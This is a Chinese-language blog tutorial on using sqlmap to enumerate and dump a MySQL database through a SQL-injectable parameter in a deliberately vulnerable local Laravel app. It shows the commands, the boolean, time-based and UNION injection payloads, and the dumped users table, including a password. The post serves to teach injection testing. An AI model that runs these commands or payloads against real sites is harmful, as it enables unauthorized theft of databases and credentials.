MySQL
话题列表 社区 Wiki 优质外文 招聘求职 MySQL 实战教程 社区文档
登录
注册

Sqlmap脱库

lyxxxh 的个人博客 / 0 / 0 / 创建于 2年前 / 更新于 2年前

文章中的环境为:
博客:造一个laravel漏洞 讲解sql盲注原理

Sqlmap

一个SqlInject 工具。

github.com/sqlmapproject/sqlmap

过程

难度就是英文而已。

获取数据库

sqlmap -u http://127.0.0.1:8000?id=1 --threads=10 --dbs

-u url地址 要带传参  sqlmap会自动分析?id=--threads 线程 1-10
--dbs 获取所有数据库

过程会是否选择服务器的cookie等,选不选都可以。

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6728=6728

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 2109 FROM (SELECT(SLEEP(5)))wLPf)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=-2812 UNION ALL SELECT NULL,CONCAT(0x71626a7a71,0x454244736f58724971716c6a4571565665764a7667564e4e4b766d5143644c51766a544a44674e70,0x7171766a71),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[00:13:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[00:13:04] [INFO] fetching database names
available databases [8]:
[*] dev
[*] home_develop
[*] information_schema
[*] laravel_project
[*] mysql
[*] performance_schema
[*] sys
[*] testdev

从sqlmap返回可知有什么数据库。

获取所有表

sqlmap -u http://127.0.0.1:8000?id=1 --threads=10 --tables -D laravel_project

-D 指定数据库
---tables 获取所有表 必须要指定数据库。
---
[00:20:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[00:20:04] [INFO] fetching tables for database: 'laravel_project'
Database: laravel_project
[5 tables]
+------------------------+
| failed_jobs            |
| migrations             |
| password_resets        |
| personal_access_tokens |
| users                  |
+------------------------+

从sqlmap返回可知有什么表。

获取users表的数据

sqlmap -u http://127.0.0.1:8000?id=1 --threads=10 -D laravel_project -T users --dump

-T 指定表
--dump  获取表所有条目的数据
[00:23:28] [INFO] fetching columns for table 'users' in database 'laravel_project'
[00:23:29] [INFO] fetching entries for table 'users' in database 'laravel_project'
Database: laravel_project
Table: users
[1 entry]
+------------+---------+-------+----------+---------------+------------+----------------+-------------------+
| id         | name    | email | password | created_at    | updated_at | remember_token | email_verified_at |
+------------+---------+-------+----------+---------------+------------+----------------+-------------------+
| worldhello | <blank> | 1     | <blank>  | 4******qq.com | <blank>    | <blank>        | xxh               |
+------------+---------

可知namexxh ,passwordworldhello

本作品采用《CC 协议》,转载必须注明作者和本文链接
专心学习不瞎搞
lyxxxh
1.3k 声望
专心瞎搞不学习
讨论数量: 0
排序:
时间 投票
(= ̄ω ̄=)··· 暂无内容!

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!
支持 MD 帮助
lyxxxh
未填写
文章
89
粉丝
108
喜欢
481
收藏
724
排名:108
访问:8.8 万
私信
所有博文
文章归档
1 篇 2024 年 9 月 1 篇 2024 年 8 月 1 篇 2024 年 3 月 1 篇 2023 年 8 月 1 篇 2023 年 7 月 1 篇 2023 年 4 月 2 篇 2022 年 9 月 4 篇 2022 年 8 月 3 篇 2022 年 7 月 2 篇 2022 年 6 月 3 篇 2022 年 4 月 1 篇 2022 年 2 月 1 篇 2022 年 1 月 1 篇 2021 年 8 月 1 篇 2021 年 6 月 3 篇 2021 年 5 月 2 篇 2021 年 3 月 1 篇 2021 年 2 月 3 篇 2020 年 11 月 3 篇 2020 年 10 月 2 篇 2020 年 9 月 5 篇 2020 年 7 月 6 篇 2020 年 6 月 7 篇 2020 年 5 月 7 篇 2020 年 4 月 7 篇 2020 年 3 月 2 篇 2019 年 9 月 3 篇 2019 年 8 月 3 篇 2019 年 7 月 3 篇 2019 年 6 月 2 篇 2019 年 5 月 3 篇 2019 年 4 月 3 篇 2018 年 11 月
最新文章 最受欢迎
5个月前 opencv获取手机屏幕内容 6个月前 Carbon::parse真是坑,直接用UTC。 11个月前 git只提交固定文件 1年前 简单丶靠谱的保证websocket客户端不断开 1年前 Laravel接口幂中间件
133 Laravel根据用户id生成四位数唯一邀请码 116 [手摸手带你创建php现代化框架] 教程终于写完了 33 一些代码写法推荐 29 记一次用户抢购商品导致服务器炸了 25 Hyperf 开发的动漫站记录
博客标签
php
4
 laravel
14
 database
4
 generator
2
 crud
3
 repository
1
 framework
1
 queue
1
 laravel-administrator
2
 pdo
1
 router
1
 homestead
1
 laravel扩展
2
 hyperf
1
 xian'tan
1
社区赞助商
成为赞助商

关于 LearnKu

LearnKu 是终身编程者的修道场
做最专业、严肃的技术论坛
LearnKu 诞生的故事

资源推荐

  • 《社区使用指南》
  • 《文档撰写指南》
  • 《LearnKu 社区规范》
  • 《提问的智慧》

    • 服务提供商

    其他信息

  • 成为版主
  • 所有测验
  • 联系站长(反馈建议)

    • 粤ICP备18099781号-6 | 粤公网安备 44030502004330号 | 违法和不良信息举报

    Summer 设计和编码

    请登录

    内容举报
    匿名举报,为防止滥用,仅管理员可见举报者。

    我要举报该,理由是:

    取消